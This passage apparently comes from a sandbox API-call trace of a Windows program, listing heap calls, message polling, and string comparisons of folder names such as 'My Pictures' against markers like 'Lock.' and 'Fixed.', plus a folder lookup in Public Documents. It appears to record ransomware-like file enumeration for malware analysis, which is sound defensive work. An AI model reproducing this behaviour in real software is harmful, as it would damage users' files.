x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0267.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.329] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0267.329] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.330] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0267.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0267.332] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0267.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0267.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0267.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0267.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0267.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0267.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.336] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0267.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.336] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0267.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0267.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0267.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0267.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1738 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x2420898 [0267.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0267.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0267.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0267.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0267.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0267.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0267.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0267.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0267.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0267.342] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0267.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0267.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0267.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.342] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.343] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.343] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents/My Pictures", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x136c5, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 0xaa5860 [0267.343] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0267.343] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.344] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.344] 